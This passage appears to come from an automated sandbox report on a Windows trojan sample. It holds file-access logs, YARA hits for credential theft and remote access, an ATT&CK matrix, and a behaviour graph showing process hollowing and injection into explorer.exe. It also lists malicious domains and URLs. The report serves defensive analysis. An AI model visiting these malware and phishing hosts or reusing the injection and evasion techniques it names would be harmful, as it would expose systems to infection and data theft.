          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\881SP1exr1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.881SP1exr1.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.4089163826.0000000005210000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4089437744.0000000005610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.4088910124.0000000005040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1699340438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1644806070.00000000040DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules
          Path Interception612
          Process Injection
          1
          Rootkit
          1
          Credential API Hooking
          121
          Security Software Discovery
          Remote Services1
          Credential API Hooking
          Exfiltration Over Other Network Medium1
          Encrypted Channel
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Masquerading
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol1
          Archive Collected Data
          Exfiltration Over Bluetooth4
          Ingress Tool Transfer
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Disable or Modify Tools
          Security Account Manager31
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
          Virtualization/Sandbox Evasion
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureScheduled Transfer13
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script612
          Process Injection
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Deobfuscate/Decode Files or Information
          Cached Domain Credentials112
          System Information Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items4
          Obfuscated Files or Information
          DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job12
          Software Packing
          Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
          Timestomp
          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1332500 Sample: 881SP1exr1.exe Startdate: 26/10/2023 Architecture: WINDOWS Score: 100 34 www.therenixgroupllc.com 2->34 36 www.therealnikib.com 2->36 38 14 other IPs or domains 2->38 42 Snort IDS alert for network traffic 2->42 44 Multi AV Scanner detection for domain / URL 2->44 46 Found malware configuration 2->46 48 9 other signatures 2->48 11 881SP1exr1.exe 3 2->11         started        signatures3 process4 signatures5 56 Tries to detect virtualization through RDTSC time measurements 11->56 58 Injects a PE file into a foreign processes 11->58 14 881SP1exr1.exe 11->14         started        process6 signatures7 60 Modifies the context of a thread in another process (thread injection) 14->60 62 Maps a DLL or memory area into another process 14->62 64 Sample uses process hollowing technique 14->64 66 Queues an APC in another process (thread injection) 14->66 17 explorer.exe 7 1 14->17 injected process8 dnsIp9 28 www.lpqxmz.site 103.120.80.111, 49748, 80 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 17->28 30 www.candicrem.com 199.34.228.191, 49752, 80 WEEBLYUS United States 17->30 32 8 other IPs or domains 17->32 40 System process connects to network (likely due to code injection or exploit) 17->40 21 chkdsk.exe 17->21         started        signatures10 process11 signatures12 50 Modifies the context of a thread in another process (thread injection) 21->50 52 Maps a DLL or memory area into another process 21->52 54 Tries to detect virtualization through RDTSC time measurements 21->54 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          881SP1exr1.exe22%ReversingLabsWin32.Trojan.Generic
          881SP1exr1.exe35%VirustotalBrowse
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          www.candicrem.com11%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.bollywood.nexusReferer:0%Avira URL Cloudsafe
          http://www.candicrem.com/4hc5/100%Avira URL Cloudmalware
          http://www.tcbbuilds.com/4hc5/www.therealnikib.com100%Avira URL Cloudmalware
          http://www.vurporn.com100%Avira URL Cloudmalware
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.7141999.com/4hc5/?P6=sJ+Ygj3voyzHV2SMJ+QMiTEgoYfBBcQbem66ypT0eUfc0EimMlq1mWlKocPRS2y/b4Gk&ntxh9=V48LzvX0100%Avira URL Cloudmalware
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
          https://outlook.com_0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2100%Avira URL Cloudphishing
          http://www.quailrun-inc.com100%Avira URL Cloudmalware
          http://www.showshoe.info/4hc5/100%Avira URL Cloudmalware
          http://www.quailrun-inc.com/4hc5/100%Avira URL Cloudmalware
